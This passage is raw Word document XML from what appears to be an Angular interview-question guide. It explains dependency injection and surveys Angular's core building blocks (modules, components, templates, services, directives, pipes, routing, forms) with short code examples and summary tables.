        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="929" w:name="_Toc197868143"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to implement dependency injection in angular</w:t>
      </w:r>
      <w:r w:rsidR="00A976FD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="929"/>
    </w:p>
    <w:p w14:paraId="7DCA2C74" w14:textId="3E1CFDC6" w:rsidR="00895951" w:rsidRPr="003C7C02" w:rsidRDefault="00895951" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>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Implement Dependency Injection (DI) in Angular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50185A3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has a built-in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 xml:space="preserve"> system that helps manage service instances and inject them where needed (like in components, directives, pipes, or other services).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514A0EC1"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57908">
          <v:rect id="_x0000_i3791" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2124D7F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reate a Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7E982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data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA0774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reates data.service.ts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530B8C9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D1E76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 // registers service in root injector (singleton)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AEEBD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9AFAF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59A975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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ADCF7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Item 1', 'Item 2'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FD95E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F6C67D4"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CD81099"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0DE01">
          <v:rect id="_x0000_i3792" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68019C97"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Inject Service into a Component</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E132F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7A6DB72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DataService } from './data.service';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E172EB3" w14:textId="77777777" w:rsidR="00895951" w:rsidRPr="003C7C02" w:rsidRDefault="00895951" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A676E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2D035C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74FCC65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2051D92A"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04E6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implements OnInit {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1B83DC" w14:textId="77777777" w:rsidR="00895951" w:rsidRPr="003C7C02" w:rsidRDefault="00895951" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C9E7BA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tems: string[] = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FA31FF" w14:textId="77777777" w:rsidR="00895951" w:rsidRPr="003C7C02" w:rsidRDefault="00895951" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="375CE14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dataService: DataService) { } // &lt;-- DI happens here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013BFC67" w14:textId="77777777" w:rsidR="00895951" w:rsidRPr="003C7C02" w:rsidRDefault="00895951" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="754E9C1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63C6D95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items = this.dataService.getData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8C28B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2037722"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FE2E18"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41ABC0">
          <v:rect id="_x0000_i3793" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="473B00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Providing Service Locally (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9F2C0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a new instance per component (not singleton), you can provide it at the component level:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6927F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mponent({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4330032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sample',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F4EA3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sample.component.html',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CB43E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DataService] // creates a new instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F81C8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66A4DD2"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66A0FE">
          <v:rect id="_x0000_i3794" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3738134F"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5292"/>
      </w:tblGrid>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="4416142F" w14:textId="77777777" w:rsidTr="00895951">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D498301"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Term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0833BE3E"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721EFB65" w14:textId="77777777" w:rsidTr="00895951">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E1129B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r</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="137B094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lls Angular how to create or get a dependency</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="22BE6D7B" w14:textId="77777777" w:rsidTr="00895951">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="299F4A6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or</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5EF61CD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sponsible for maintaining and providing services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="7353A6BB" w14:textId="77777777" w:rsidTr="00895951">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E7AD2A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oken</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48F17CF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key used to locate a dependency (usually the class itself)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="02BF2668" w14:textId="77777777" w:rsidTr="00895951">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B304B1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able</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="36BCC43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marking a class as available for DI</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A310366"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B0B9C">
          <v:rect id="_x0000_i3795" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="455C52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DI in Services (Chaining Services)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E603A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027B27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DF5E53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D67F82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Service {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A7C3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logger: LoggerService) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FDAB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7145283" w14:textId="08EA304D"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796" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D83660D" w14:textId="2F9B23AE" w:rsidR="00A976FD" w:rsidRPr="00CE4B95" w:rsidRDefault="00410D60">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="930" w:name="_Toc197868144"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What are different components of Angular</w:t>
      </w:r>
      <w:r w:rsidR="00A976FD" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="930"/>
    </w:p>
    <w:p w14:paraId="7D4C91AF" w14:textId="5013A5FA" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="003C7C02"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hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00CC724A" w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ngular applications are built using several core components that work together to create the structure of the application. Here’s an overview of the main components in Angular:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7DEAA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Modules (@NgModule)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A0AB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applications are organized into </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>modules</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which act as containers for the different parts of an application. A module bundles related code, such as components, services, and other modules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D90C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49BCC9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A9641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 MyComponent],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21597DF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HttpClientModule],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014163F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MyService],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A5A7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2222EA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07D52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52DC6A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s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE5765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omponents are the building blocks of an Angular application. They control a section of the user interface (UI) and are composed of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FAA87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Defines the view.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601D158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Defines the appearance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CF9609"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Contains the logic and behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BBC7B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2EA69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5E932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6E502E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15103BF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my-component.component.css']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADA69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817A2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC1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essage = 'Hello, Angular!';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D242E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00C7E4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Templates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A55C6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emplates define the HTML structure for the component. They can contain Angular-specific syntax, such as data binding, directives, and event handlers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679FCE3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8B7CE9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lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7DDE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 message }}&lt;/h1&gt; &lt;!-- Interpolation binding --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE038E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button (click)="changeMessage()"&gt;Change Message&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF390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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2404A41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ervices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6116C7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Services are used to share data and logic across components and modules. Services are typically injected into components using </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Dependency Injection (DI)</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FF33A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66D15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1D1A60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72DB362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BA6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2F54F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Data() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6955161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Data 1', 'Data 2', 'Data 3'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003E8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98E51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E878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ives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685A81D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rectives are special markers in the DOM that add behavior to elements. There are three types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7335388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 directives</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Modify the DOM layout (e.g., *ngFor, *ngIf).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC772AE"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 directives</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Modify the appearance or behavior of an element (e.g., ngClass, ngStyle).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8767F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ustom directives</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can also create your own directives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAD0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E38FA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Visible"&gt;This is visible!&lt;/div&gt;  &lt;!-- Structural Directive --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE9E4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button [ngClass]="{ 'highlighted': isHighlighted }"&gt;Click Me&lt;/button&gt;  &lt;!-- Attribute Directive --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F6BC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ipes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B7E8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Pipes are used to transform data before displaying it in the view. Angular has built-in pipes like DatePipe, CurrencyPipe, and UpperCasePipe. You can also create custom pipes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F648F3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1FD69D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birthday | date: 'short' }}&lt;/p&gt;  &lt;!-- DatePipe --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076508A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price | currency }}&lt;/p&gt;  &lt;!-- CurrencyPipe --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A09974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Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFD69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he Angular Router helps navigate between views or pages in a single-page application (SPA). It is defined in the </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AppRoutingModule</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and manages URL mapping and route navigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D332C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514FE0E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0074956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 component: HomeComponent },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139457D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about', component: AboutComponent }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFA17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62FF1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Forms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE1093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provides two ways to work with forms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2A95F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driven forms</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Declarative forms defined using templates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C7CD31"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ctive forms</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Programmatically created forms using FormGroup and FormControl.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D17ADE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 (Reactive Form):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4078A18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form = new FormGroup({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDACEF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new FormControl('')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4339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D0072C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Dependency Injection (DI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553F3E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2EA0A7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644E23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Change Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BD0B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0DD09">
          <v:rect id="_x0000_i3797" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDA55C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439"/>
      </w:tblGrid>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="0CC9916D" w14:textId="77777777" w:rsidTr="00CC724A">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F1AD41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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03486EA6"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urpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="4D733D83" w14:textId="77777777" w:rsidTr="00CC724A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BDCC2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ules</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F10AA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rganize code and define application boundaries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="55F50CF9" w14:textId="77777777" w:rsidTr="00CC724A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="590B9DC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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DB00D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rol the UI and define views</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="5F1AB42A" w14:textId="77777777" w:rsidTr="00CC724A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34FF7F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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48D2EE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 HTML structure and binding in the component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="450C1999" w14:textId="77777777" w:rsidTr="00CC724A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E7EA93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s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C2F7E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hare data and logic across components</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="3D182FF2" w14:textId="77777777" w:rsidTr="00CC724A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C3ED8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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11F9F4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odify the behavior or appearance of elements in the DOM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="7B0F52A1" w14:textId="77777777" w:rsidTr="00CC724A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63F41E1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ipes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27336D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 data for presentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="72F49FD8" w14:textId="77777777" w:rsidTr="00CC724A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15E1F4E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outing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="187C487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navigation between views</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003C7C02" w:rsidRPr="003C7C02" w14:paraId="7A217961" w14:textId="77777777" w:rsidTr="00CC724A">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DA51E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orms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3290DAA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form management and validation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
